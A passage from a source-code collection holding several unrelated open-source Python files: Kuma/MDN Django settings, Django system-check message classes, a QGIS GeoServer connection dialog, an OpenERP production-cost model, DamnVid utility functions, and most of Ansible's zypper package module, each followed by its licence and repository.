"challenge:2013:february",
"challenge:2013:january",
"challenge:2012:december",
"challenge:2012:november",
"challenge:2012:october",
"challenge:2012:september",
"challenge:2012:august",
"challenge:2012:july",
"challenge:2012:june",
"challenge:2012:may",
"challenge:2012:april",
"challenge:2012:march",
"challenge:2012:february",
"challenge:2012:january",
"challenge:2011:december",
"challenge:2011:november",
"challenge:2011:october",
"challenge:2011:september",
"challenge:2011:august",
"challenge:2011:july",
"challenge:2011:june",
]),
"Dev derby tags for previous challenges (space-separated tags)"
),
DEMOS_DEVDERBY_HOMEPAGE_FEATURED_DEMO=(
0,
'The ID of the demo which should be featured on the new homepage structure'
),
BASKET_RETRIES=(
5,
        'Number of times to retry a basket post before giving up.'
),
BASKET_RETRY_WAIT=(
.5,
'How long to wait between basket api request retries. '
'We typically multiply this value by the retry number so, e.g., '
'the 4th retry waits 4*.5 = 2 seconds.'
),
BASKET_API_KEY=(
'',
'API Key to use for basket requests'
),
BETA_GROUP_NAME=(
'Beta Testers',
'Name of the django.contrib.auth.models.Group to use as beta testers'
),
KUMA_DOCUMENT_RENDER_TIMEOUT=(
180.0,
'Maximum seconds to wait before considering a rendering in progress or '
'scheduled as failed and allowing another attempt.'
),
KUMA_DOCUMENT_FORCE_DEFERRED_TIMEOUT=(
10.0,
'Maximum seconds to allow a document to spend rendering during the '
'response cycle before flagging it to be sent to the deferred rendering '
'queue for future renders.'
),
KUMASCRIPT_TIMEOUT=(
0.0,
'Maximum seconds to wait for a response from the kumascript service. '
'On timeout, the document gets served up as-is and without macro '
'evaluation as an attempt at graceful failure. NOTE: a value of 0 '
'disables kumascript altogether.'
),
KUMASCRIPT_MAX_AGE=(
600,
'Maximum acceptable age (in seconds) of a cached response from '
'kumascript. Passed along in a Cache-Control: max-age={value} header, '
'which tells kumascript whether or not to serve up a cached response.'
),
KUMA_CUSTOM_CSS_PATH=(
'/en-US/docs/Template:CustomCSS',
'Path to a wiki document whose raw content will be loaded as a CSS '
'stylesheet for the wiki base template. Will also cause the ?raw '
'parameter for this path to send a Content-Type: text/css header. Empty '
'value disables the feature altogether.',
),
KUMA_CUSTOM_SAMPLE_CSS_PATH=(
'/en-US/docs/Template:CustomSampleCSS',
'Path to a wiki document whose raw content will be loaded as a CSS '
'stylesheet for live sample template. Will also cause the ?raw '
'parameter for this path to send a Content-Type: text/css header. Empty '
'value disables the feature altogether.',
),
DIFF_CONTEXT_LINES=(
0,
'Number of lines of context to show in diff display.',
),
FEED_DIFF_CONTEXT_LINES=(
3,
'Number of lines of context to show in feed diff display.',
),
WIKI_ATTACHMENT_ALLOWED_TYPES=(
'image/gif image/jpeg image/png image/svg+xml text/html image/vnd.adobe.photoshop',
'Allowed file types for wiki file attachments',
),
KUMA_WIKI_IFRAME_ALLOWED_HOSTS=(
'^https?\:\/\/(developer-local.allizom.org|developer.allizom.org|mozillademos.org|testserver|localhost\:8000|(www.)?youtube.com\/embed\/(\.*))',
'Regex comprised of domain names that are allowed for IFRAME SRCs'
),
GOOGLE_ANALYTICS_ACCOUNT=(
'0',
'Google Analytics Tracking Account Number (0 to disable)',
),
OPTIMIZELY_PROJECT_ID=(
'',
'The ID value for optimizely Project Code script'
),
BLEACH_ALLOWED_TAGS=(
json.dumps([
'a', 'p', 'div',
]),
"JSON array of tags allowed through Bleach",
),
BLEACH_ALLOWED_ATTRIBUTES=(
json.dumps({
'*': ['id', 'class', 'style', 'lang'],
}),
"JSON object associating tags with lists of allowed attributes",
),
BLEACH_ALLOWED_STYLES=(
json.dumps([
'font-size', 'text-align',
]),
"JSON array listing CSS styles allowed on tags",
),
WIKI_DOCUMENT_TAG_SUGGESTIONS=(
json.dumps([
"Accessibility", "AJAX", "API", "Apps",
"Canvas", "CSS", "Device", "DOM", "Events",
"Extensions", "Firefox", "Firefox OS", "Games",
"Gecko", "Graphics", "Internationalization", "History", "HTML", "HTTP", "JavaScript", "Layout",
"Localization", "MDN", "Mobile", "Mozilla",
"Networking", "Persona", "Places", "Plugins", "Protocols",
"Reference", "Tutorial", "Landing",
"junk", "NeedsMarkupWork", "NeedsContent", "NeedsExample",
]),
"JSON array listing tag suggestions for documents"
),
SEARCH_FILTER_TAG_OPTIONS=(
json.dumps([
"Accessibility", "AJAX", "API", "Apps",
"Canvas", "CSS", "Device", "DOM", "Events",
"Extensions", "Firefox", "Firefox OS", "Games",
"Gecko", "Graphics", "Internationalization", "History", "HTML", "HTTP", "JavaScript", "Layout",
"Localization", "MDN", "Mobile", "Mozilla",
"Networking", "Persona", "Places", "Plugins", "Protocols",
"Reference", "Tutorial", "Landing",
"junk", "NeedsMarkupWork", "NeedsContent", "NeedsExample",
]),
"JSON array of tags that are enabled for search faceting"
),
SESSION_CLEANUP_CHUNK_SIZE=(
1000,
'Number of expired sessions to cleanup up in one go.',
),
WELCOME_EMAIL_FROM=(
"Janet Swisher <no-reply@mozilla.org>",
'Email address from which welcome emails will be sent',
),
EMAIL_LIST_FOR_FIRST_EDITS=(
"mdn-spam-watch@mozilla.com",
"Email address to which emails will be sent for users' first edits",
),
)
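# At runtime these values are read through django-constance rather than this
# module, e.g. (illustrative):
#   from constance import config
#   config.KUMASCRIPT_TIMEOUT  # 0.0 until overridden in the admin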
BASKET_URL = 'https://basket.mozilla.com'
BASKET_APPS_NEWSLETTER = 'app-dev'
KUMASCRIPT_URL_TEMPLATE = 'http://developer.mozilla.org:9080/docs/{path}'
# Elasticsearch related settings.
ES_DEFAULT_NUM_REPLICAS = 1
ES_DEFAULT_NUM_SHARDS = 5
ES_DEFAULT_REFRESH_INTERVAL = '5s'
ES_DISABLED = True
ES_INDEX_PREFIX = 'mdn'
ES_INDEXES = {'default': 'main_index'}
# Specify the extra timeout in seconds for the indexing ES connection.
ES_INDEXING_TIMEOUT = 30
ES_LIVE_INDEX = False
ES_URLS = ['localhost:9200']
LOG_LEVEL = logging.WARN
SYSLOG_TAG = 'http_app_kuma'
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse',
},
},
'formatters': {
'default': {
'format': '{0}: %(asctime)s %(name)s:%(levelname)s %(message)s: '
'%(pathname)s:%(lineno)s'.format(SYSLOG_TAG),
}
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'formatter': 'default',
'level': LOG_LEVEL,
},
'mail_admins': {
'class': 'django.utils.log.AdminEmailHandler',
'filters': ['require_debug_false'],
'level': logging.ERROR,
},
},
'loggers': {
'kuma': {
'handlers': ['console'],
'propagate': True,
'level': logging.ERROR,
},
'django.request': {
'handlers': ['console'],
'propagate': True,
'level': logging.ERROR,
},
'elasticsearch': {
'handlers': ['console'],
'level': logging.ERROR,
},
'urllib3': {
'handlers': ['console'],
'level': logging.ERROR,
},
'cacheback': {
'handlers': ['console'],
'level': logging.ERROR,
}
},
}
CSRF_COOKIE_SECURE = True
X_FRAME_OPTIONS = 'DENY'
DBGETTEXT_PATH = 'kuma/core/'
DBGETTEXT_ROOT = 'translations'
def get_user_url(user):
from kuma.core.urlresolvers import reverse
return reverse('users.profile', args=[user.username])
ABSOLUTE_URL_OVERRIDES = {
'users.user': get_user_url
}
# Honor the X-Forwarded-Proto header for environments like local dev VM that
# uses Apache mod_proxy instead of mod_wsgi
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# Auth and permissions related constants
LOGIN_URL = reverse_lazy('account_login')
LOGOUT_URL = reverse_lazy('account_logout')
LOGIN_REDIRECT_URL = reverse_lazy('home')
# django-allauth configuration
ACCOUNT_LOGOUT_REDIRECT_URL = '/'
ACCOUNT_DEFAULT_HTTP_PROTOCOL = 'https'
ACCOUNT_EMAIL_VERIFICATION = 'mandatory'
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_LOGOUT_ON_GET = True
ACCOUNT_USERNAME_MIN_LENGTH = 3
ACCOUNT_ADAPTER = 'kuma.users.adapters.KumaAccountAdapter'
ACCOUNT_SIGNUP_FORM_CLASS = 'kuma.users.forms.NewsletterForm' # weird but needed
ACCOUNT_UNIQUE_EMAIL = False
SOCIALACCOUNT_ADAPTER = 'kuma.users.adapters.KumaSocialAccountAdapter'
SOCIALACCOUNT_EMAIL_VERIFICATION = 'mandatory'
SOCIALACCOUNT_EMAIL_REQUIRED = True
SOCIALACCOUNT_AUTO_SIGNUP = False # forces the use of the signup view
SOCIALACCOUNT_QUERY_EMAIL = True # used by the custom github provider
SOCIALACCOUNT_PROVIDERS = {
'persona': {
'AUDIENCE': 'https://developer.mozilla.org',
'REQUEST_PARAMETERS': {
'siteName': 'Mozilla Developer Network',
'siteLogo': '/media/img/opengraph-logo.png',
}
}
}
PERSONA_VERIFIER_URL = 'https://verifier.login.persona.org/verify'
PERSONA_INCLUDE_URL = 'https://login.persona.org/include.js'
HONEYPOT_FIELD_NAME = 'website'
# TODO: Once using DRF more we need to make that exception handler more generic
REST_FRAMEWORK = {
'EXCEPTION_HANDLER': 'kuma.search.utils.search_exception_handler'
}
|
mpl-2.0
|
petecummings/django
|
django/core/checks/messages.py
|
319
|
2383
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.utils.encoding import force_str, python_2_unicode_compatible
# Levels
DEBUG = 10
INFO = 20
WARNING = 30
ERROR = 40
CRITICAL = 50
@python_2_unicode_compatible
class CheckMessage(object):
def __init__(self, level, msg, hint=None, obj=None, id=None):
assert isinstance(level, int), "The first argument should be level."
self.level = level
self.msg = msg
self.hint = hint
self.obj = obj
self.id = id
def __eq__(self, other):
return all(getattr(self, attr) == getattr(other, attr)
for attr in ['level', 'msg', 'hint', 'obj', 'id'])
def __ne__(self, other):
return not (self == other)
def __str__(self):
from django.db import models
if self.obj is None:
obj = "?"
elif isinstance(self.obj, models.base.ModelBase):
            # We need to hardcode the ModelBase and Field cases because their
            # __str__ methods don't return "app_label.modellabel" and cannot be changed.
obj = self.obj._meta.label
else:
obj = force_str(self.obj)
id = "(%s) " % self.id if self.id else ""
hint = "\n\tHINT: %s" % self.hint if self.hint else ''
return "%s: %s%s%s" % (obj, id, self.msg, hint)
def __repr__(self):
return "<%s: level=%r, msg=%r, hint=%r, obj=%r, id=%r>" % \
(self.__class__.__name__, self.level, self.msg, self.hint, self.obj, self.id)
def is_serious(self):
return self.level >= ERROR
def is_silenced(self):
from django.conf import settings
return self.id in settings.SILENCED_SYSTEM_CHECKS
class Debug(CheckMessage):
def __init__(self, *args, **kwargs):
super(Debug, self).__init__(DEBUG, *args, **kwargs)
class Info(CheckMessage):
def __init__(self, *args, **kwargs):
super(Info, self).__init__(INFO, *args, **kwargs)
class Warning(CheckMessage):
def __init__(self, *args, **kwargs):
super(Warning, self).__init__(WARNING, *args, **kwargs)
class Error(CheckMessage):
def __init__(self, *args, **kwargs):
super(Error, self).__init__(ERROR, *args, **kwargs)
class Critical(CheckMessage):
def __init__(self, *args, **kwargs):
super(Critical, self).__init__(CRITICAL, *args, **kwargs)
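# Illustrative usage (hypothetical check, not part of this module): system
# checks build and return instances of the classes above, e.g.
#   Error(
#       "'foo' is not a callable.",
#       hint="Pass a callable instead.",
#       obj=my_field,
#       id='myapp.E001',
#   )
# which __str__ renders as "<obj>: (myapp.E001) 'foo' is not a callable."
# followed by an indented HINT line.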
|
bsd-3-clause
|
yjacolin/qgis-geoserver-plugin
|
src/geoserverexplorer/gui/dialogs/catalogdialog.py
|
1
|
6939
|
from PyQt4 import QtGui, QtCore
from qgis.gui import *
from qgis.core import *
from geoserverexplorer.geoserver import pem
class DefineCatalogDialog(QtGui.QDialog):
def __init__(self, catalogs, parent = None):
super(DefineCatalogDialog, self).__init__(parent)
self.catalogs = catalogs
self.ok = False
self.initGui()
def initGui(self):
self.setWindowTitle('Catalog definition')
verticalLayout = QtGui.QVBoxLayout()
horizontalLayout = QtGui.QHBoxLayout()
horizontalLayout.setSpacing(30)
horizontalLayout.setMargin(0)
nameLabel = QtGui.QLabel('Catalog name')
nameLabel.setMinimumWidth(150)
self.nameBox = QtGui.QLineEdit()
settings = QtCore.QSettings()
name = settings.value('/GeoServer/LastCatalogName', 'Default GeoServer catalog')
self.nameBox.setText(name)
self.nameBox.setMinimumWidth(250)
horizontalLayout.addWidget(nameLabel)
horizontalLayout.addWidget(self.nameBox)
verticalLayout.addLayout(horizontalLayout)
horizontalLayout = QtGui.QHBoxLayout()
horizontalLayout.setSpacing(30)
horizontalLayout.setMargin(0)
urlLabel = QtGui.QLabel('URL')
urlLabel.setMinimumWidth(150)
self.urlBox = QtGui.QLineEdit()
url = settings.value('/GeoServer/LastCatalogUrl', 'http://localhost:8080/geoserver')
self.urlBox.setText(url)
self.urlBox.setMinimumWidth(250)
horizontalLayout.addWidget(urlLabel)
horizontalLayout.addWidget(self.urlBox)
verticalLayout.addLayout(horizontalLayout)
self.groupBox = QtGui.QGroupBox()
self.groupBox.setTitle("GeoServer Connection parameters")
self.groupBox.setLayout(verticalLayout)
layout = QtGui.QVBoxLayout()
layout.addWidget(self.groupBox)
self.spacer = QtGui.QSpacerItem(20,20, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
layout.addItem(self.spacer)
self.tabWidget = QtGui.QTabWidget()
tabBasicAuth = QtGui.QWidget()
tabBasicAuthLayout = QtGui.QVBoxLayout(tabBasicAuth)
horizontalLayout = QtGui.QHBoxLayout()
horizontalLayout.setSpacing(30)
horizontalLayout.setMargin(0)
usernameLabel = QtGui.QLabel('User name')
usernameLabel.setMinimumWidth(150)
self.usernameBox = QtGui.QLineEdit()
self.usernameBox.setText('admin')
self.usernameBox.setMinimumWidth(250)
horizontalLayout.addWidget(usernameLabel)
horizontalLayout.addWidget(self.usernameBox)
tabBasicAuthLayout.addLayout(horizontalLayout)
horizontalLayout = QtGui.QHBoxLayout()
horizontalLayout.setSpacing(30)
horizontalLayout.setMargin(0)
passwordLabel = QtGui.QLabel('Password')
passwordLabel.setMinimumWidth(150)
self.passwordBox = QtGui.QLineEdit()
self.passwordBox.setEchoMode(QtGui.QLineEdit.Password)
self.passwordBox.setText('geoserver')
self.passwordBox.setMinimumWidth(250)
horizontalLayout.addWidget(passwordLabel)
horizontalLayout.addWidget(self.passwordBox)
tabBasicAuthLayout.addLayout(horizontalLayout)
self.tabWidget.addTab(tabBasicAuth, "Basic")
try:
self.certWidget = QgsAuthConfigSelect( keypasssupported = False)
self.tabWidget.addTab(self.certWidget, "Configurations")
except NameError:
#for QGIS without PKI support
pass
verticalLayout3 = QtGui.QVBoxLayout()
verticalLayout3.addWidget(self.tabWidget)
self.authBox = QtGui.QGroupBox()
self.authBox.setTitle("Authentication")
self.authBox.setLayout(verticalLayout3)
verticalLayout.addWidget(self.authBox)
self.spacer = QtGui.QSpacerItem(20,20, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
layout.addItem(self.spacer)
self.buttonBox = QtGui.QDialogButtonBox(QtGui.QDialogButtonBox.Ok | QtGui.QDialogButtonBox.Close)
layout.addWidget(self.buttonBox)
self.setLayout(layout)
self.buttonBox.accepted.connect(self.okPressed)
self.buttonBox.rejected.connect(self.cancelPressed)
self.resize(400,200)
def okPressed(self):
self.url = unicode(self.urlBox.text().strip('/') + '/rest')
if not self.url.startswith('http'):
self.url = 'http://%s' % self.url
if self.tabWidget.currentIndex() == 0:
self.username = unicode(self.usernameBox.text())
self.password = unicode(self.passwordBox.text())
self.certfile = None
self.keyfile = None
self.cafile = None
self.authid = None
else:
self.username = None
self.password = None
self.authid = self.certWidget.configId()
            authtype = QgsAuthManager.instance().configProviderType(self.authid)
if authtype == QgsAuthType.None or authtype == QgsAuthType.Unknown:
QtGui.QMessageBox.warning(self, "Authentication needed",
"Please specify a valid authentication for connecting to the catalog")
return
if authtype == QgsAuthType.Basic:
configbasic = QgsAuthConfigBasic()
QgsAuthManager.instance().loadAuthenticationConfig(self.authid, configbasic, True)
self.password = configbasic.password()
self.username = configbasic.username()
elif authtype in [QgsAuthType.PkiPaths, QgsAuthType.PkiPkcs12]:
self.certfile, self.keyfile, self.cafile = pem.getPemPkiPaths(self.authid, authtype)
else:
QtGui.QMessageBox.warning(self, "Unsupported authentication",
"The selected authentication type is not supported")
return
self.name = unicode(self.nameBox.text())
name = self.name
i = 2
while name in self.catalogs.keys():
name = self.name + "_" + str(i)
i += 1
self.name = name
settings = QtCore.QSettings()
settings.setValue('/GeoServer/LastCatalogName', self.nameBox.text())
settings.setValue('/GeoServer/LastCatalogUrl', self.urlBox.text())
saveCatalogs = bool(settings.value("/GeoServer/Settings/GeoServer/SaveCatalogs", True, bool))
if saveCatalogs:
settings.beginGroup("/GeoServer/Catalogs/" + self.name)
settings.setValue("url", self.url);
if self.authid is not None:
settings.setValue("authid", self.authid)
else:
settings.setValue("username", self.username)
settings.endGroup()
self.ok = True
self.close()
def cancelPressed(self):
self.ok = False
self.close()
|
gpl-2.0
|
Rona111/sale_commission
|
__unported__/production_costs/fixed_cost.py
|
3
|
2109
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). All Rights Reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from osv import fields, osv
from tools.translate import _
import decimal_precision as dp
import time
class mrp_production_fixed_costs(osv.osv):
"""
Class that represents a production fixed costs
"""
_name = 'mrp.production.fixed.costs'
_columns = {
'name': fields.char('Description', size=128, required=True),
'amount': fields.float('Amount', digits_compute=dp.get_precision('Account')),
'production_id': fields.many2one('mrp.production', 'Production', required=True),
'company_id': fields.many2one('res.company', 'Company')
}
_defaults = {
'company_id': lambda self, cr, uid, context: self.pool.get('res.users').browse(cr, uid, uid).company_id.id,
'production_id': lambda self, cr, uid, context: context.get('parent_id') and context['parent_id'] or False,
}
mrp_production_fixed_costs()
class mrp_production_add_fixed_costs(osv.osv):
_inherit = 'mrp.production'
_columns = {
'fixed_costs': fields.one2many('mrp.production.fixed.costs', 'production_id', 'Production fixed costs'),
}
mrp_production_add_fixed_costs()
|
agpl-3.0
|
zacoxicompton/damnvid
|
dCore.py
|
12
|
3195
|
# -*- coding: utf-8 -*-
# os and random are required by DamnTempFile() below.
import os
import random
def DamnUnicode(s):
if type(s) is type(u''):
return s
if type(s) is type(''):
try:
return unicode(s)
except:
try:
return unicode(s.decode('utf8'))
except:
try:
return unicode(s.decode('windows-1252')) # Windows file paths with accents and weird characters
except:
return unicode(s, errors='ignore')
try:
return unicode(s)
except:
try:
return DamnUnicode(str(s))
except:
return s
def DamnOpenFile(f, m):
f = DamnUnicode(f)
try:
return open(f, m)
except:
try:
return open(f.encode('utf8'), m)
except:
try:
return open(f.encode('windows-1252'), m)
except:
return open(f.encode('utf8', 'ignore'), m)
def DamnExecFile(f, globs={}, locs={}, addDV=True):
if addDV:
globs['DV'] = DV
locs['DV'] = DV
try:
execfile(DamnUnicode(f), globs, locs)
except:
try:
execfile(DamnUnicode(f).encode('utf8'), globs, locs)
except:
try:
execfile(DamnUnicode(f).encode('windows-1252'), globs, locs)
except:
try:
from dLog import Damnlog, DamnlogException
import sys
DamnlogException(*(sys.exc_info()))
Damnlog('Could not execute file', f)
except:
pass
def DamnVersionCompare(v1, v2): # Returns 1 if v1 is newer, 0 if equal, -1 if v2 is newer.
v1 = DamnUnicode(v1).split(u'.')
v2 = DamnUnicode(v2).split(u'.')
for i in range(len(v1)):
if len(v2) <= i:
return 1
if v1[i] != v2[i]:
return 2 * int(int(v1[i]) > int(v2[i])) - 1
if len(v1) != len(v2):
return 2 * (len(v1) > len(v2)) - 1
return 0
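# Worked examples of the comparison contract above (values are illustrative):
#   DamnVersionCompare('1.2.10', '1.2.9') -> 1   (numeric, not lexical, compare)
#   DamnVersionCompare('1.2', '1.2')      -> 0
#   DamnVersionCompare('1.2', '1.2.1')    -> -1  (the longer version wins)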
class DamnCurry:
# From http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/52549
def __init__(self, func, *args, **kwargs):
self.func = func
self.pending = args[:]
self.kwargs = kwargs
def __str__(self):
return u'<DamnCurry of ' + DamnUnicode(self.func) + u'; args = ' + DamnUnicode(self.pending) + u'; kwargs = ' + DamnUnicode(self.kwargs) + u'>'
def __repr__(self):
return self.__str__()
def __call__(self, *args, **kwargs):
if kwargs and self.kwargs:
kw = self.kwargs.copy()
kw.update(kwargs)
else:
kw = kwargs or self.kwargs
return self.func(*(self.pending + args), **kw)
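# Illustrative usage of DamnCurry (hypothetical callable names):
#   greet = DamnCurry(some_func, 'Hello', punctuation='!')
#   greet('world')                    # some_func('Hello', 'world', punctuation='!')
#   greet('world', punctuation='?')   # call-time kwargs override the stored ones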
def DamnTempFile():
name = DV.tmp_path + DamnUnicode(random.random()) + '.tmp'
while os.path.exists(name):
name = DV.tmp_path + DamnUnicode(random.random()) + '.tmp'
Damnlog('Temp file requested. Return:', name)
return name
def DamnNothing(*args, **kwargs):
return
class DamnEmpty:
pass
class DamnDummy:
def __getitem__(self, key):
return self
def __getattr__(self, name):
return self
def __call__(self, *args, **kwargs):
return self
def __repr__(self):
return 'DamnDummy()'
def __str__(self):
return 'DamnDummy'
def __unicode__(self):
return u'DamnDummy'
DV = DamnEmpty()
def DamnOverridePath(prefix, otherwise=None):
global DV
prefix = DamnUnicode(prefix).lower()
for i in DV.argv:
if i[:len(prefix)].lower() == prefix:
result = i[len(prefix):]
if result[-1:] != DV.sep:
result += DV.sep
DV.argv = [x for x in DV.argv if x[:len(prefix)].lower() != prefix]
return result
if otherwise is not None:
return DamnUnicode(otherwise)
DV.postEvent = DamnNothing # Will be replaced by wx's events
|
gpl-3.0
|
h0nIg/ansible-modules-extras
|
packaging/os/zypper.py
|
20
|
11010
|
#!/usr/bin/python -tt
# -*- coding: utf-8 -*-
# (c) 2013, Patrick Callahan <pmc@patrickcallahan.com>
# based on
# openbsd_pkg
# (c) 2013
# Patrik Lundin <patrik.lundin.swe@gmail.com>
#
# yum
# (c) 2012, Red Hat, Inc
# Written by Seth Vidal <skvidal at fedoraproject.org>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
import re
DOCUMENTATION = '''
---
module: zypper
author:
- "Patrick Callahan (@dirtyharrycallahan)"
- "Alexander Gubin (@alxgu)"
version_added: "1.2"
short_description: Manage packages on SUSE and openSUSE
description:
- Manage packages on SUSE and openSUSE using the zypper and rpm tools.
options:
name:
description:
      - Package name or package specifier with version, C(name) or C(name-1.0). You can also pass a URL or a local path to an rpm file.
required: true
aliases: [ 'pkg' ]
state:
description:
- C(present) will make sure the package is installed.
C(latest) will make sure the latest version of the package is installed.
C(absent) will make sure the specified package is not installed.
required: false
choices: [ present, latest, absent ]
default: "present"
type:
description:
- The type of package to be operated on.
required: false
choices: [ package, patch, pattern, product, srcpackage ]
default: "package"
version_added: "2.0"
disable_gpg_check:
description:
      - Whether to disable the GPG signature checking of the package
        being installed. Has an effect only if state is
I(present) or I(latest).
required: false
default: "no"
choices: [ "yes", "no" ]
aliases: []
disable_recommends:
version_added: "1.8"
description:
      - Corresponds to the C(--no-recommends) option for I(zypper). The default (C(yes)) passes C(--no-recommends), so recommended packages are not installed; C(no) lets zypper install recommended packages as well.
required: false
default: "yes"
choices: [ "yes", "no" ]
notes: []
# informational: requirements for nodes
requirements: [ zypper, rpm ]
'''
EXAMPLES = '''
# Install "nmap"
- zypper: name=nmap state=present
# Install apache2 with recommended packages
- zypper: name=apache2 state=present disable_recommends=no
# Remove the "nmap" package
- zypper: name=nmap state=absent
# Install the nginx rpm from a remote repo
- zypper: name=http://nginx.org/packages/sles/12/x86_64/RPMS/nginx-1.8.0-1.sles12.ngx.x86_64.rpm state=present
# Install local rpm file
- zypper: name=/tmp/fancy-software.rpm state=present
'''
# Function used for getting zypper version
def zypper_version(module):
"""Return (rc, message) tuple"""
cmd = ['/usr/bin/zypper', '-V']
rc, stdout, stderr = module.run_command(cmd, check_rc=False)
if rc == 0:
return rc, stdout
else:
return rc, stderr
# Function used for getting versions of currently installed packages.
def get_current_version(m, packages):
cmd = ['/bin/rpm', '-q', '--qf', '%{NAME} %{VERSION}-%{RELEASE}\n']
cmd.extend(packages)
rc, stdout, stderr = m.run_command(cmd, check_rc=False)
current_version = {}
rpmoutput_re = re.compile('^(\S+) (\S+)$')
for stdoutline in stdout.splitlines():
match = rpmoutput_re.match(stdoutline)
        if match is None:
return None
package = match.group(1)
version = match.group(2)
current_version[package] = version
for package in packages:
if package not in current_version:
print package + ' was not returned by rpm \n'
return None
return current_version
# Function used to find out if a package is currently installed.
def get_package_state(m, packages):
for i in range(0, len(packages)):
# Check state of a local rpm-file
if ".rpm" in packages[i]:
# Check if rpm file is available
package = packages[i]
            if not os.path.isfile(package) and '://' not in package:
stderr = "No Package file matching '%s' found on system" % package
m.fail_json(msg=stderr, rc=1)
# Get packagename from rpm file
cmd = ['/bin/rpm', '--query', '--qf', '%{NAME}', '--package']
cmd.append(package)
rc, stdout, stderr = m.run_command(cmd, check_rc=False)
packages[i] = stdout
cmd = ['/bin/rpm', '--query', '--qf', 'package %{NAME} is installed\n']
cmd.extend(packages)
rc, stdout, stderr = m.run_command(cmd, check_rc=False)
installed_state = {}
rpmoutput_re = re.compile('^package (\S+) (.*)$')
for stdoutline in stdout.splitlines():
match = rpmoutput_re.match(stdoutline)
        if match is None:
continue
package = match.group(1)
result = match.group(2)
if result == 'is installed':
installed_state[package] = True
else:
installed_state[package] = False
return installed_state
# Function used to make sure a package is present.
def package_present(m, name, installed_state, package_type, disable_gpg_check, disable_recommends, old_zypper):
packages = []
for package in name:
if package not in installed_state or installed_state[package] is False:
packages.append(package)
if len(packages) != 0:
cmd = ['/usr/bin/zypper', '--non-interactive']
# add global options before zypper command
if disable_gpg_check:
cmd.append('--no-gpg-checks')
cmd.extend(['install', '--auto-agree-with-licenses', '-t', package_type])
# add install parameter
if disable_recommends and not old_zypper:
cmd.append('--no-recommends')
cmd.extend(packages)
rc, stdout, stderr = m.run_command(cmd, check_rc=False)
if rc == 0:
changed=True
else:
changed=False
else:
rc = 0
stdout = ''
stderr = ''
changed=False
return (rc, stdout, stderr, changed)
# Function used to make sure a package is the latest available version.
def package_latest(m, name, installed_state, package_type, disable_gpg_check, disable_recommends, old_zypper):
# first of all, make sure all the packages are installed
(rc, stdout, stderr, changed) = package_present(m, name, installed_state, package_type, disable_gpg_check, disable_recommends, old_zypper)
    # return if an error occurred during installation,
    # otherwise error messages will be lost and the user doesn't see any error
if rc:
return (rc, stdout, stderr, changed)
# if we've already made a change, we don't have to check whether a version changed
if not changed:
pre_upgrade_versions = get_current_version(m, name)
cmd = ['/usr/bin/zypper', '--non-interactive']
if disable_gpg_check:
cmd.append('--no-gpg-checks')
if old_zypper:
cmd.extend(['install', '--auto-agree-with-licenses', '-t', package_type])
else:
cmd.extend(['update', '--auto-agree-with-licenses', '-t', package_type])
cmd.extend(name)
rc, stdout, stderr = m.run_command(cmd, check_rc=False)
# if we've already made a change, we don't have to check whether a version changed
if not changed:
post_upgrade_versions = get_current_version(m, name)
if pre_upgrade_versions != post_upgrade_versions:
changed = True
return (rc, stdout, stderr, changed)
# Function used to make sure a package is not installed.
def package_absent(m, name, installed_state, package_type, old_zypper):
packages = []
for package in name:
if package not in installed_state or installed_state[package] is True:
packages.append(package)
if len(packages) != 0:
cmd = ['/usr/bin/zypper', '--non-interactive', 'remove', '-t', package_type]
cmd.extend(packages)
rc, stdout, stderr = m.run_command(cmd)
if rc == 0:
changed=True
else:
changed=False
else:
rc = 0
stdout = ''
stderr = ''
changed=False
return (rc, stdout, stderr, changed)
# ===========================================
# Main control flow
def main():
module = AnsibleModule(
argument_spec = dict(
name = dict(required=True, aliases=['pkg'], type='list'),
state = dict(required=False, default='present', choices=['absent', 'installed', 'latest', 'present', 'removed']),
type = dict(required=False, default='package', choices=['package', 'patch', 'pattern', 'product', 'srcpackage']),
disable_gpg_check = dict(required=False, default='no', type='bool'),
disable_recommends = dict(required=False, default='yes', type='bool'),
),
supports_check_mode = False
)
params = module.params
name = params['name']
state = params['state']
type_ = params['type']
disable_gpg_check = params['disable_gpg_check']
disable_recommends = params['disable_recommends']
rc = 0
stdout = ''
stderr = ''
result = {}
result['name'] = name
result['state'] = state
rc, out = zypper_version(module)
match = re.match(r'zypper\s+(\d+)\.(\d+)\.(\d+)', out)
if not match or int(match.group(1)) > 0:
old_zypper = False
else:
old_zypper = True
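    # "Old" (0.x) zypper is handled specially below: package_present() skips
    # the --no-recommends flag for it and package_latest() uses 'install'
    # instead of 'update'.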
# Get package state
installed_state = get_package_state(module, name)
# Perform requested action
if state in ['installed', 'present']:
(rc, stdout, stderr, changed) = package_present(module, name, installed_state, type_, disable_gpg_check, disable_recommends, old_zypper)
elif state in ['absent', 'removed']:
(rc, stdout, stderr, changed) = package_absent(module, name, installed_state, type_, old_zypper)
elif state == 'latest':
(rc, stdout, stderr, changed) = package_latest(module, name, installed_state, type_, disable_gpg_check, disable_recommends, old_zypper)
